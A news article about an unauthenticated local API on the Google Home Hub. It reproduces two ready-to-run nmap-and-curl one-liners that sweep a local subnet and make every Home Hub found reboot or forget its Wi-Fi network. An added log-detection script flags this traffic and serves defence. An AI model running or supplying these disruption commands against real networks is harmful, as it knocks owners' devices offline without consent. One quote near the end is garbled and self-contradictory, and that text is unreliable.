This one weird trick turns your Google Home Hub into a doorstop • The Register




A security researcher says an undocumented API is responsible for a vulnerability that can crash the Google Home Hub assistant.

Flaw finder Jerry Gamblin says the security hole allows the device to be removed from the network, requiring manual reconfiguration.

The problem, Gamblin said, stems from the Google Home Hub's inclusion of a local API that had not previously been disclosed. This API can be called via the command line.

"Since none of these endpoints require authentication, it is trivial," Gamblin explained.

Gamblin explained that the curl requests can be used to carry out commands like showing basic system data or running a speed test. They can also show the currently configured network information.

More importantly, the API also allows a caller to make the Home Hub reboot itself, or to delete its configured network, which would leave the Home Hub unusable until the owner manually reconfigured it with the Google Home app.

Without further ado, here is the reboot code:


nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I% curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot

And here is the delete network command:


nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I% curl -Lv -H Content-Type:application/json --data-raw '{"wpa_id":0}' http://%:8008/setup/forget_wifi

We trust everyone will use these codes responsibly and with the most noble of intentions.
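
For anyone monitoring a network with these devices on it, both requests have a recognisable signature: a POST to port 8008 at /setup/reboot or /setup/forget_wifi, often sent to several hosts in a row. The script below is an added example, not code from the article or from Gamblin; the log format, the sample lines and the function names are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the article): flag use of the Home Hub setup API.
# Assumed log format: "<time> <src_ip> <dst_ip>:<port> <method> <path>" (IPv4).

# Constructed sample lines, not real traffic.
sample_log() {
cat <<'EOF'
2018-10-31T09:00:01 192.168.1.50 192.168.1.20:8008 GET /
2018-10-31T09:00:02 192.168.1.50 192.168.1.10:80 POST /setup/reboot
2018-10-31T09:01:10 192.168.1.77 192.168.1.20:8008 POST /setup/reboot
2018-10-31T09:01:10 192.168.1.77 192.168.1.21:8008 POST /setup/reboot
2018-10-31T09:01:11 192.168.1.77 192.168.1.22:8008 POST /setup/reboot
2018-10-31T09:02:30 192.168.1.77 192.168.1.20:8008 POST /setup/forget_wifi
EOF
}

# Reads log lines on stdin. Prints:
#   ALERT <src> <dst> <path>  for each POST to a disruptive endpoint on 8008
#   SWEEP <src> <count>       for each source that contacted at least
#                             $1 (default 3) distinct hosts on port 8008
detect_hub_abuse() {
  awk -v th="${1:-3}" '
    {
      n = split($3, hp, ":")               # hp[1] = host, hp[2] = port
      if (n != 2 || hp[2] != "8008") next  # only the local API port
      src = $2; dst = hp[1]; method = $4; path = $5
      sub(/\?.*/, "", path)                # drop any query string
      if (!((src, dst) in seen)) { seen[src, dst] = 1; hosts[src]++ }
      if (method == "POST" &&
          (path == "/setup/reboot" || path == "/setup/forget_wifi"))
        print "ALERT", src, dst, path
    }
    END {
      for (s in hosts)
        if (hosts[s] >= th) print "SWEEP", s, hosts[s]
    }'
}

# Run against the constructed sample.
sample_log | detect_hub_abuse 3
```
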

Needless to say, Gamblin is not impressed with the state of the Home Hub.

"I am genuinely shocked by how poor the overall security of these devices are," Gamblin said.

"I usually would have done so, but they would have done so, but they would not have it."

Google did not return a request for comment on the matter. ®
